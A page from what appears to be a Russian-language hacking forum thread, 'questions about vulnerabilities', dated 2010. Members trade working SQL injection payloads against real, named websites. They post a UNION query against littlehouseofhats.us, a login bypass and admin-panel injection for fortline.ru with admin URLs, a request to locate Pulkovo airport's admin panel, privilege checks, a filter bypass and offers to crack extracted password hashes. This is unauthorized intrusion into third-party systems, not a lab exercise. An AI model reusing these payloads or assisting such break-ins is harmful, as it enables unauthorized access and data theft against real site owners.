Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    вот этот скрин: http://trueimages.ru/img/80/6f/1ec59bd54f1b3ca61fbba93205c.jpg
    фильтрация недостаточная раз пропускает все символы, вследствии чего можно сделать вывод что cross-site-scripting возможен.
     
    _________________________
  2. pinch

    pinch Elder - Старейшина

    Joined:
    13 Dec 2009
    Messages:
    417
    Likes Received:
    46
    Reputations:
    40
    значит таблицы в другой базе.

    1. Узнаем базу под которой работает необходимая таблица
    id=1+union+select+1,2,3,4,5,6,7,8,table_schema+from+information_schema.tables+where+table_name='имя_таблицы'--

    2. Делаем запрос
    id=1+union+select+1,userid,3,4,5,6,7,8,9,10+from+имя_базы.ftpuser--
     
    1 person likes this.
  3. auth_root

    auth_root Member

    Joined:
    31 Jan 2010
    Messages:
    17
    Likes Received:
    10
    Reputations:
    0
    Помогите раскрутить
    Не могу вывести колумны. По коунт кол-во 453, могу посмотреть.Вывести не могу.
    Стял mod_security, обошел, а вот что еще фильтруется не пойму.

     
  4. pinch

    pinch Elder - Старейшина

    Joined:
    13 Dec 2009
    Messages:
    417
    Likes Received:
    46
    Reputations:
    40
    http://littlehouseofhats.us/collection_details.php?ID=-130'+/*!UNION*/+SELECT+COLUMN_NAME,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+FROM+INFORMATION_SCHEMA.COLUMNS+LIMIT+10,1%23
     
  5. rooopster

    rooopster New Member

    Joined:
    29 Aug 2010
    Messages:
    19
    Likes Received:
    2
    Reputations:
    0
    привет, подскажите в пм вход в админку http://www.fortline.ru/ , пожалуйста
     
    1 person likes this.
  6. Дирижабль

    Дирижабль [ ✯✯✯ Ядерный Суицид ✯✯✯ ]

    Joined:
    6 Jan 2010
    Messages:
    369
    Likes Received:
    346
    Reputations:
    292
    https://www.fortline.ru/manager/
    +
    http://www.fortline.ru/cms/index.php
    ------------------
    LOGIN: 1' or 1=1# 1
    PASS: hgfjhgjtgfjthitufikjk


    +в админке sql inj.
    http://www.fortline.ru/cms/edit_cl.php?id=9'+or+(select+count(*)+from+information_schema.tables+group+by+concat(version(),floor(rand(0)*2)))--+


    P.S http://www.fortline.ru/cms/access.php
     
    #15326 Дирижабль, 11 Nov 2010
    Last edited: 11 Nov 2010
    11 people like this.
  7. MastaBass1

    MastaBass1 Member

    Joined:
    25 Dec 2009
    Messages:
    61
    Likes Received:
    13
    Reputations:
    2
    Слушай класс, а не можешь какой-нибудь мануал по такой уязвимости скинуть? Как так? :)
    И вот такой вопрос на неком сайте вставляю такую же конструкцию, он мне выдает:
    Введите Ваш логин и пароль 1\' or 1=1# 1
    Тесть к кавычке подставляет слеш, как обойти?
     
    1 person likes this.
  8. DeepBlue7

    DeepBlue7 Elder - Старейшина

    Joined:
    2 Jan 2009
    Messages:
    359
    Likes Received:
    50
    Reputations:
    12
    О боже. В наше время, уже доволько редко встречается. В твоем случае, скорее всего там есть фильтрация... скорее всего, даже можеш не пытатся or-ом)).
     
    1 person likes this.
  9. Mirrey

    Mirrey New Member

    Joined:
    10 Sep 2010
    Messages:
    35
    Likes Received:
    1
    Reputations:
    0
    Есть скуль, как проверить привелегии? И есть ли права FILE_PRIV ?
     
  10. DeepBlue7

    DeepBlue7 Elder - Старейшина

    Joined:
    2 Jan 2009
    Messages:
    359
    Likes Received:
    50
    Reputations:
    12
    Code:
    select concat(user,0x2f,FILE_PRIV) from mysql.user limit 1,1--
     
    1 person likes this.
  11. pinch

    pinch Elder - Старейшина

    Joined:
    13 Dec 2009
    Messages:
    417
    Likes Received:
    46
    Reputations:
    40
    Проверяем права на запись и чтение файлов
    id=1+union+select+1,2,3,4,file_priv+from+mysql.user+where+user='root'--
    Y-есть права
    N-нет прав
     
    2 people like this.
  12. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    а поиск на форуме поискать влом? сколько можно на одни и те же вопросы отвечать....просто 3.14здец полнейший...опять каникулы что ли?
     
    3 people like this.
  13. z0mbyak

    z0mbyak Active Member

    Joined:
    10 Apr 2010
    Messages:
    537
    Likes Received:
    200
    Reputations:
    293
    Вы несколько не правы, так как может быть несколько юзеров и соответственно различные права, поэтому нужно узнать под кем мы сидим, для этого используется
    id=1+union+select+1,2,3,4,user()--
    а затем уже проверять конкретного
    id=1+union+select+1,2,3,4,file_priv+from+mysql.user+where+user='наш юзер под которым сидим'--
     
    2 people like this.
  14. DeepBlue7

    DeepBlue7 Elder - Старейшина

    Joined:
    2 Jan 2009
    Messages:
    359
    Likes Received:
    50
    Reputations:
    12
    Не думаю. Обычно параноики юзают NoScript, или просто тупо отрубают жабу.
     
  15. MastaBass1

    MastaBass1 Member

    Joined:
    25 Dec 2009
    Messages:
    61
    Likes Received:
    13
    Reputations:
    2
    Так помогите найти админку то на http://www.pulkovoairport.ru/, нужно очень срочно!
     
  16. JohnnyBGoode

    JohnnyBGoode Member

    Joined:
    5 Oct 2010
    Messages:
    48
    Likes Received:
    11
    Reputations:
    5
    Вытащил из БД хэш,расшифровал,при авторизации выдает ошибку.
    Зарегистрировался там,вытащил свой хэш,при расшифровке не сходится с моим паролем.
    Что тут такое ?
     
  17. DeepBlue7

    DeepBlue7 Elder - Старейшина

    Joined:
    2 Jan 2009
    Messages:
    359
    Likes Received:
    50
    Reputations:
    12
    Мож тупо совпадение, что удалось сбрутить, и там есть соль ?
     
  18. JohnnyBGoode

    JohnnyBGoode Member

    Joined:
    5 Oct 2010
    Messages:
    48
    Likes Received:
    11
    Reputations:
    5
    Не знаю даже,помимо колонки password,откуда достал хэш,есть еще колонка hash,но оттуда что-то ничего не выводится
     
  19. shell_c0de

    shell_c0de Hack All World

    Joined:
    7 Jul 2009
    Messages:
    1,174
    Likes Received:
    617
    Reputations:
    690
    ищи колумны password:hash:salt
    или скинь в ПМ линк посмотрю и сбручу твой пароль )
     
    _________________________
  20. swat_

    swat_ Member

    Joined:
    4 Nov 2009
    Messages:
    137
    Likes Received:
    30
    Reputations:
    1
    подскажите пожалуйста что это за уязвимость
    PHP:
    http://userttool-258-www.bigpoint.net/
     
    #15340 swat_, 13 Nov 2010
    Last edited: 13 Nov 2010
Thread Status:
Not open for further replies.